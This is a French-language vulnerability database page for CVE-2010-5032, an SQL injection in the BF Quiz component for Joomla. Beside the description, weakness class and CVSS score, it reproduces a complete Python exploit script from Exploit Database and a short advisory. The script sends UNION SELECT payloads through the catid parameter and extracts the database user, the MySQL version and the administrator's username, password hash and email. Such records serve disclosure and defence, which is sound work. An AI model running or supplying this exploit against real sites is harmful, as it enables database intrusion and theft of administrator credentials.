CVE-2010-5032 : Détail

CVE-2010-5032

SQL Injection
A03-Injection
2.25%V4
Network
2011-11-02
20h00 +00:00
2017-08-28
10h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in the BF Quiz (com_bfquiztrial) component before 1.3.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in a bfquiztrial action to index.php.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 12796

Date de publication : 2010-05-28 22h00 +00:00
Auteur : Valentin Hoebel
EDB Vérifié : Yes

#!/usr/bin/python # Joomla Component BF Quiz SQL Injection Exploit # by Valentin Hoebel (valentin@xenuser.org) # Version 1.0 (29th May 2010) # ASCII FOR BREAKFAST # About the vulnerability: # ---------------------------------------------------------------------------- # Read more here: # http://xenuser.org/documents/security/joomla_com_bfquiz_sqli.txt # About the exploit: # ---------------------------------------------------------------------------- # Tries to give you the admin password hash! # Usage example: # python joomla_com_bfquiz_sploit.py - u "http://target/index.php?option=com_bfquiztrial&view=bfquiztrial&catid=34" # This tool war written for educational purposes only. I am not responsible for any damage # you might cause using this tool. Know and respect your local laws! # Only use this tool on websites you are allowed to test :) # Greetz && THX # ---------------------------------------------------------------------------------- # Greetz: cr4wl3r and /JosS # Greetz && THX to: inj3ct0r, Exploit DB team, hack0wn and packetstormsecurity.org # Power to the cows! import sys, re, urllib, urllib2, string from urllib2 import Request, urlopen, URLError, HTTPError # Prints usage def print_usage(): print "" print "" print "________________________________________________" print "Joomla Component BF Quiz SQL Injection Exploit" print "by Valentin Hoebel (valentin@xenuser.org)" print "" print " (__) " print " (oo) Version 1.0 (29th May 2010) " print " /-------\/ " print " / | || " print " * ||----|| " print " ~~ ~~ Power to teh cows!" print "________________________________________________" print "" print "Exploits the SQL injection vulnerability I" print "discovered within the Joomla component BF Quiz." print "" print "Usage example:" print "python joomla_com_bfquiz_sploit.py - u \"http://target/index.php?option=com_bfquiztrial&view=bfquiztrial&catid=34\"" print "" print "Options:" print " -u <URL> (start the exploit)" print " --help (displays this text)" print "" print "Features:" print " - Check if provided URL is reachable" print " - Display current database, MySQL user and the MySQL version" print " - Display the password hash of the Joomla administrator" print "" print "" return #Prints banner def print_banner(): print "" print "" print "________________________________________________" print "Joomla Component BF Quiz SQL Injection Exploit" print "by Valentin Hoebel (valentin@xenuser.org)" print "" print " (__) " print " (oo) Version 1.0 (29th May 2010) " print " /-------\/ " print " / | || " print " * ||----|| " print " ~~ ~~ Power to teh cows!" print "________________________________________________" return # Testing if URL is reachable, with error handling def test_url(): print "[.] Checking if connection can be established..." try: response = urllib2.urlopen(provided_url) except HTTPError, e: print "[!] The connection could not be established." print "[!] Error code: ", e.code print "[!]Exiting now!" print "" sys.exit(1) except URLError, e: print "[!] The connection could not be established." print "[!] Reason: ", e.reason print "[!] Exiting now!" print "" sys.exit(1) else: valid_target = 1 print "[.] Connected to target! URL seems to be valid." return def exploit_url(): # Define injection string for reading out basic information information_injection_string = "+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat_ws(0x3b,0x503077337220743020743368206330777321,user(),database(),version(),0x503077337220743020743368206330777321),11,12,13,14,concat_ws(0x3b,0x503077337220743020743368206330777321,user(),database(),version(),0x503077337220743020743368206330777321),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,concat_ws(0x3b,0x503077337220743020743368206330777321,user(),database(),version(),0x503077337220743020743368206330777321),79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,concat_ws(0x3b,0x503077337220743020743368206330777321,user(),database(),version(),0x503077337220743020743368206330777321),97,98,99,100--" admin_pass_hash_injection_string = "+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat_ws(0x3b,0x503077337220743020743368206330777321,id,name,username,password,email,usertype,0x503077337220743020743368206330777321),11,12,13,14,concat_ws(0x3b,0x503077337220743020743368206330777321,id,name,username,password,email,usertype,0x503077337220743020743368206330777321),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,concat_ws(0x3b,0x503077337220743020743368206330777321,id,name,username,password,email,usertype,0x503077337220743020743368206330777321),79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,concat_ws(0x3b,0x503077337220743020743368206330777321,id,name,username,password,email,usertype,0x503077337220743020743368206330777321),97,98,99,100+from+jos_users+LIMIT+0,1--" # Craft the URLs which are about to be exploited exploit_url_information = provided_url+information_injection_string exploit_url_admin_pass_hash = provided_url+admin_pass_hash_injection_string # Read out some interesting stuff print "[.] Reading out some interesting information..." response = urllib2.urlopen(exploit_url_information) html = response.read() # Now extract the interesting information get_secret_data = string.find(html, "P0w3r t0 t3h c0ws!") # If the target is not vulnerable exit if get_secret_data == -1: print "[!] Exploitation failed. Maybe the target isn't vulnerable?" print "[!] Hint: The exploit doesn't work on every target by default." print "[!] If you have knowledge about MySQL injection simply have a look at the source code and change the injection strings." print "[!] For me it worked on 3/10 targets by default." print "[!] Exiting now!" print "" sys.exit(1) get_secret_data += 18 new_html4= html[get_secret_data :] new_get_secret_data4 = string.find(new_html4, "P0w3r t0 t3h c0ws!") new_html_5 = new_html4[:new_get_secret_data4] # Data was received, now format and display it formatted_output = str.split(new_html_5, ";") print "[+] MySQL Database User: ", formatted_output[1:2] print "[+] MySQL Database: ", formatted_output[2:3] print "[+] MySQL Version: ", formatted_output[3:4] # Now let's get the admin password hash! print "[.] Getting the admin password hash..." response = urllib2.urlopen(exploit_url_admin_pass_hash) html = response.read() get_secret_data = string.find(html, "P0w3r t0 t3h c0ws!") get_secret_data += 18 new_html = html[get_secret_data :] new_get_secret_data = string.find(new_html, "P0w3r t0 t3h c0ws!") new_html_2 = new_html[:new_get_secret_data] # Data was received, now format and display it formatted_output = str.split(new_html_2, ";") print "[+] ID: ", formatted_output[1:2] print "[+] Name: ", formatted_output[2:3] print "[+] Username: ", formatted_output[3:4] print "[+] Password Hash: ", formatted_output[4:5] print "[+] E-Mail Address: ", formatted_output[5:6] print "[+] User status: ", formatted_output[6:7] print "[.] That's it! Bye!" print "" sys.exit(1) return # Checking if argument was provided if len(sys.argv) <=1: print_usage() sys.exit(1) for arg in sys.argv: # Checking if help was called if arg == "--help": print_usage() sys.exit(1) # Checking if URL was provided, if yes -> go! if arg == "-u": provided_url = sys.argv[2] print_banner() # At first we test if we can actually reach the provided URL test_url() # Now start the main exploit function exploit_url() ### EOF ###
Exploit Database EDB-ID : 12780

Date de publication : 2010-05-27 22h00 +00:00
Auteur : Valentin
EDB Vérifié : Yes

# Exploit Title: Joomla Component BF Quiz SQL Injection Vulnerability # Date: 29th May 2010 # Author: Valentin # Category: webapps/0day # Version: 1.3.0 # Tested on: Debian, Apache2, MySQL 5 # CVE : # Code : [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] >> General Information Advisory/Exploit Title = Joomla Component BF Quiz SQL Injection Vulnerability Author = Valentin Hoebel Contact = valentin@xenuser.org [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] >> Product information Name = BF Quiz Vendor = Tamlyn Creative Pty Ltd Vendor Website = http://www.tamlyncreative.com/software/ Affected Version(s) = 1.3.0 [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] >> SQL Injection Example URI = index.php?option=com_bfquiztrial&view=bfquiztrial&catid=[SQL Injection]&Itemid=62 [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::] >> Additional Information Advisory/Exploit Published = 29th May 2010 I found this vulnerability while testing my new SQL injection vulnerability scanner. (Will be released soon!) Actually didn't find the vulnerability when I looked at this Joomla component for the first time, lol. [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::] >> Misc Greetz && Thanks = inj3ct0r team, Exploit DB and hack0wn! Special Greetz = cr4wl3r and /JosS! <3 packetstormsecurity.org! [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]

Products Mentioned

Configuraton 0

Tamlyncreative>>Com_bfquiztrial >> Version To (including) 1.3.0

    Joomla>>Joomla\! >> Version *

    Références

    http://secunia.com/advisories/39960
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.vupen.com/english/advisories/2010/1272
    Tags : vdb-entry, x_refsource_VUPEN
    http://osvdb.org/65001
    Tags : vdb-entry, x_refsource_OSVDB
    http://www.securityfocus.com/bid/40435
    Tags : vdb-entry, x_refsource_BID
    Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC) sont maintenues par MITRE Corporation, et les informations sur les configurations logicielles et matérielles (CPE) proviennent du NVD.